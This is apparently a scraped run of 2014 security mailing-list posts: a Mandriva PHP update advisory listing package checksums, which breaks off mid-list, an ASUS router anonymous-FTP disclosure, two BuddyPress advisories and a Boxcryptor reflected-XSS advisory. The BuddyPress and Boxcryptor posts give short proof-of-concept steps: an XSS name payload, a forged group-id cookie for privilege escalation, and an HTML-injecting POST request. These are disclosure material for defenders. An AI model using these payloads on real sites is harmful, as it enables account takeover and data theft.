Lovett Discovered - June, 2012
[ MDVSA-2014:027 ] php
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:027 http://www.mandriva.com/en/support/security/ ___ Package : php Date: February 12, 2014 Affected: Business Server 1.0 ___ Problem Description: A vulnerability has been discovered and corrected in php: * Fixed bug #66356 (Heap Overflow Vulnerability in imagecrop()) (CVE-2013-7226). The updated php packages have been upgraded to the 5.5.9 version which is not vulnerable to this issue. Additionally, the PECL packages which requires so has been rebuilt for php-5.5.9. The libmbfl packages has been synced with the changes as of php-5.5.9 and the onig packages has been upgraded to the 5.9.5 version. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7226 http://www.php.net/ChangeLog-5.php#5.5.9 http://git.php.net/?p=php-src.git;a=commitdiff;h=8f4a5373bb71590352fd934028d6dde5bc18530b https://bugs.php.net/bug.php?id=66356 ___ Updated Packages: Mandriva Business Server 1/X86_64: f68e9cde917fe443e9e441d0c9d66ce8 mbs1/x86_64/apache-mod_php-5.5.9-1.mbs1.x86_64.rpm 7d10a339a073e79141312df4c9ca80aa mbs1/x86_64/lib64mbfl1-1.2.0-1.1.mbs1.x86_64.rpm 4dfdb36268a4643b62314bd3b75219b6 mbs1/x86_64/lib64mbfl-devel-1.2.0-1.1.mbs1.x86_64.rpm 2cf508b8892b0a23d6fb981bcdddb41f mbs1/x86_64/lib64onig2-5.9.5-1.mbs1.x86_64.rpm 7b0dc040e7713261fb799dcb32e82c0e mbs1/x86_64/lib64onig-devel-5.9.5-1.mbs1.x86_64.rpm 70b8fd8096d66f171efb55ae05f456a3 mbs1/x86_64/lib64php5_common5-5.5.9-1.mbs1.x86_64.rpm 0fd3276c68104c57d28a6e18fea826d0 mbs1/x86_64/php-apc-3.1.15-1.3.mbs1.x86_64.rpm 7800323fc65b42caa674e7396af2a4e1 mbs1/x86_64/php-apc-admin-3.1.15-1.3.mbs1.x86_64.rpm 5d70731fa91073490f37ca42398c608e mbs1/x86_64/php-bcmath-5.5.9-1.mbs1.x86_64.rpm 212fc2be9f276372bbfbc64f6439e2b2 mbs1/x86_64/php-bz2-5.5.9-1.mbs1.x86_64.rpm 45686258cb550c4f88c396162e6780fd mbs1/x86_64/php-calendar-5.5.9-1.mbs1.x86_64.rpm 45b23276ead2e0c29eb3558e2255e993 mbs1/x86_64/php-cgi-5.5.9-1.mbs1.x86_64.rpm d3106420622d1e8acdb7e90862ece84e mbs1/x86_64/php-cli-5.5.9-1.mbs1.x86_64.rpm 3ad121278fd62309e6f74780006c43ae mbs1/x86_64/php-ctype-5.5.9-1.mbs1.x86_64.rpm df2513d9d0b3419c627cc59454a8d7c3 mbs1/x86_64/php-curl-5.5.9-1.mbs1.x86_64.rpm 551edd728468a317b708916cc966060f mbs1/x86_64/php-dba-5.5.9-1.mbs1.x86_64.rpm f718f7207e681d82d63c2bd8cceaaa54 mbs1/x86_64/php-devel-5.5.9-1.mbs1.x86_64.rpm 5bb0bc339d01f573d0d8a0de9d9234d4 mbs1/x86_64/php-doc-5.5.9-1.mbs1.noarch.rpm 3db6e08c25717fed5c997c07883e88b0 mbs1/x86_64/php-dom-5.5.9-1.mbs1.x86_64.rpm 4d9c5351d500add57174c5900a47a0c3 mbs1/x86_64/php-enchant-5.5.9-1.mbs1.x86_64.rpm 46dbf9383d34d95af4792cfb82ac73d8 mbs1/x86_64/php-exif-5.5.9-1.mbs1.x86_64.rpm 87cd6dc4cb42b8aef1d98cc65173ce4d mbs1/x86_64/php-fileinfo-5.5.9-1.mbs1.x86_64.rpm b694bf03a1a46a981f27d73dcf547666 mbs1/x86_64/php-filter-5.5.9-1.mbs1.x86_64.rpm 4b4e7ccf4c358ef349355a2ad6ce191a mbs1/x86_64/php-fpm-5.5.9-1.mbs1.x86_64.rpm 5af9b30649f5a66b7fa3f0219ed61e8e mbs1/x86_64/php-ftp-5.5.9-1.mbs1.x86_64.rpm 3a141efc96b7cf3a5f23b07be5299410 mbs1/x86_64/php-gd-5.5.9-1.mbs1.x86_64.rpm a679a6b91e879cea954e2da8a9aed576 mbs1/x86_64/php-gettext-5.5.9-1.mbs1.x86_64.rpm a43329af2e0c6a86eab88a4cf953b1c2 mbs1/x86_64/php-gmp-5.5.9-1.mbs1.x86_64.rpm 1e7313076b1bbf6921da6e08880ee34f mbs1/x86_64/php-hash-5.5.9-1.mbs1.x86_64.rpm 88753c2cac7139338c48cc6b6255d189 mbs1/x86_64/php-iconv-5.5.9-1.mbs1.x86_64.rpm f9030b302aab1ccb4768504c976029ff mbs1/x86_64/php-imap-5.5.9-1.mbs1.x86_64.rpm d1764ebab05662d9c4f70ab6a4c161e6 mbs1/x86_64/php-ini-5.5.9-1.mbs1.x86_64.rpm 9096c1ac1cb73c52c041f0326089413f mbs1/x86_64/php-intl-5.5.9-1.mbs1.x86_64.rpm 145b4b3c23f91c6d649abe4ce37dbff3 mbs1/x86_64/php-json-5.5.9-1.mbs1.x86_64.rpm 45d6f9b9c85e41cea60ace17da9a53b5 mbs1/x86_64/php-ldap-5.5.9-1.mbs1.x86_64.rpm e9eaacd6b95eff0c7d2a183c37e85b9d mbs1/x86_64/php-mbstring-5.5.9-1.mbs1.x86_64.rpm 960056fb90c4696618a2c7db08c49752 mbs1/x86_64/php-mcrypt-5.5.9-1.mbs1.x86_64.rpm 1a849355c2c2356a29c35bf92c6c9e14 mbs1/x86_64/php-mssql-5.5.9-1.mbs1.x86_64.rpm 6b8960494d45a16271862b3a04bbf7b0 mbs1/x86_64/php-mysql-5.5.9-1.mbs1.x86_64.rpm dd1a58aeeb51962139211ef4f7dc2b13 mbs1/x86_64/php-mysqli-5.5.9-1.mbs1.x86_64.rpm 9b8f5797d7f1372c3a863bed7dfe18db mbs1/x86_64/php-mysqlnd-5.5.9-1.mbs1.x86_64.rpm a2ea2e43581521ebb20cedd36c08b843 mbs1/x86_64/php-odbc-5.5.9-1.mbs1.x86_64.rpm b1f61e8f0a9d359cfebfaed8371e118b mbs1/x86_64/php-opcache-5.5.9-1.mbs1.x86_64.rpm d798dc1028db4ec202ee62251ba2c03f
Re: ASUS RT Series Routers FTP Service - Default anonymous access
Correction: I meant to say 2013, not 2012. I apologize for the error. On Wed, Feb 12, 2014 at 4:29 PM, kyle Lovett krlov...@gmail.com wrote: Five ASUS RT series routers suffer from a vendor vulnerability that default FTP service to anonymous access, full read/write permissions. The service, which is activated from the administrative console does not give proper instructions nor indications that the end user needs to manually add a user to the FTP access table. The vendor was first alerted to this issue in late June of 2012, and then four other times officially from July 2012 to December 2012. It was not until January of this year, when the editors for the Norwegian publication IDG/PC World went to ASUS that any official response came. This vulnerability has been exploited aggressively for sometime now, and as a rolling count which has been kept ongoing since July 2012, over 30,000 unique IP address, at one time or another have had their FTP service shared. The FTP services, when not secured, allows for full read/write access to any external storage devices attached to the usb drives on the router. The vendor has issued an official (beta) patch for the RT-AC68U as of mid-January, and plans on additional patches in the coming week. Models Include: RT-AC68U RT-AC56U RT-AC66U RT-N66U RT-N16 CWE-287: Improper Authentication CVSS v2 Vector (AV:N/AC:L/Au:N/C:C/I:C/A:N/E:H/RL:OF/RC:C) CVSS Base Score 9.4 Impact Subscore 9.2 Exploitability Subscore 10 CVSS Temporal Score 8.2 Overall CVSS Score 8.2 Many have reported malware being uploaded into the sync share folders, large amounts of unauthorized file sharing and most importantly the theft of entire hard drives of personal information. Over 7,300 units are still vulnerable to this weakness as of today. It is strongly urged that those with any of the above routers check to ensure that their FTP service has been secured. Links: https://www.asus.com/Networking/RTAC68U/#support http://www.idg.no/pcworld/article281004.ece http://www.thinkbroadband.com/news/6229-new-asus-router-firmware-to-fix-ftp-security-issue.html http://www.pcworld.com/article/2087180/asus-simplifies-router-configuration-to-protect-external-hard-drives.html Research Contact - Kyle Lovett Discovered - June, 2012
Wordpress plugin Buddypress = 1.9.1 stored xss vulnerability
# Vulnerability: Wordpress plugin Buddypress = 1.9.1 stored xss
# Date: 13/02/2014
# Author: Pietro Oliva
# Vendor Homepage: http://buddypress.org
# Software Link: http://downloads.wordpress.org/plugin/buddypress.1.9.1.zip
# Version: 1.9.1
# CVE : [CVE-2014-1888]
# Responsibly disclosed and patched in version 1.9.2
During the group creation process in Buddypress it's possible to
inject javascript code into the name field in the form at
http://example.com/groups/create/step/group-details/ as for instance:
name onmouseover=alert('xss').
To test this vulnerability you have reproduce the following steps:
1) create a group named as follows: name onmouseover=alert('xss')
2) visiting this
url:http://example.com/groups/create/step/group-details/ causes the
alert to show on mouse over the group name field
-Pietro Oliva-
Wordpress plugin Buddypress = 1.9.1 privilege escalation vulnerability
# Vulnerability: Wordpress plugin Buddypress = 1.9.1 privilege escalation # Date: 13/02/2014 # Author: Pietro Oliva # Vendor Homepage: http://buddypress.org # Software Link: http://downloads.wordpress.org/plugin/buddypress.1.9.1.zip # Version: 1.9.1 # CVE : [CVE-2014-1889] # Responsibly disclosed and patched in version 1.9.2 it's possible to perform a privilege escalation attack due to a lack of permissions check in the group creation process. A malicious user could exploit this vulnerability to take control of every group (change name, description, avatar and settings). To exploit this vulnerability you have to follow these steps: 1) Create a cookie named bp_new_group_id=id_of_victim_group 2) Visit the url http://example.com/groups/create/step/group-details/ 3) Enjoy the power -Pietro Oliva-
[ISecAuditors Security Advisories] - Reflected XSS vulnerability in Boxcryptor (www.boxcryptor.com)
= INTERNET SECURITY AUDITORS ALERT 2014-001 - Original release date: February 4, 2014 - Last revised: February 4, 2014 - Discovered by: Vicente Aguilera Diaz - Severity: 4.3/10 (CVSSv2 Base Scored) - CVE-ID: - = I. VULNERABILITY - Reflected XSS vulnerability in Boxcryptor (www.boxcryptor.com). II. BACKGROUND - Boxcryptor is an easy-to-use encryption software optimized for the cloud. It allows the secure use of cloud storage services without sacrificing comfort. Boxcryptor supports all major cloud storage providers (such as Dropbox, Google Drive, Microsoft SkyDrive, SugarSync) and supports all the clouds that use the WebDAV standard (such as Cubby, Strato HiDrive, and ownCloud). III. DESCRIPTION - Has been detected a XSS vulnerability in www.boxcryptor.com. Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page. IV. PROOF OF CONCEPT - Next, we show a typical request to save changes in My Account option: POST /app/user/modify/userID HTTP/1.1 Host: www.boxcryptor.com ... firstname=firstnamelastname=lastnameusername=email_newsletter= where: - userID is a numeric user ID generated by boxcryptor - firstname is the firstname specified by the user - lastname is the lastname specified by the user - email is the email address specified by the user A malicious user can inject arbitrary HTML/script code in the email parameter. For example: POST /app/user/modify/3805739018726483071 HTTP/1.1 Host: www.boxcryptor.com ... firstname=Johnlastname=Smithusername=johnsm...@gmail.comH1centerThis+is+a+XSS+example/center/H1_newsletter= V. BUSINESS IMPACT - An attacker can execute arbitrary HTML or script code in a targeted user's browser. This can leverage to steal sensitive information as user credentials, personal data, etc. VI. SYSTEMS AFFECTED - www.boxcryptor.com VII. SOLUTION - - VIII. REFERENCES - http://www.isecauditors.com http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) IX. CREDITS - This vulnerability has been discovered by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com). X. REVISION HISTORY - February 4, 2014: Initial release XI. DISCLOSURE TIMELINE - February 4, 2014: Discovered by Internet Security Auditors February 6, 2014: Contact with the developer team February 10, 2014: Confirmed by vendor February 10, 2014: Vendor deployed a new version February 13, 2014: Internet Security Auditors release the advisory XII. LEGAL NOTICES - The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information. XIII. ABOUT - Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in RD include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.
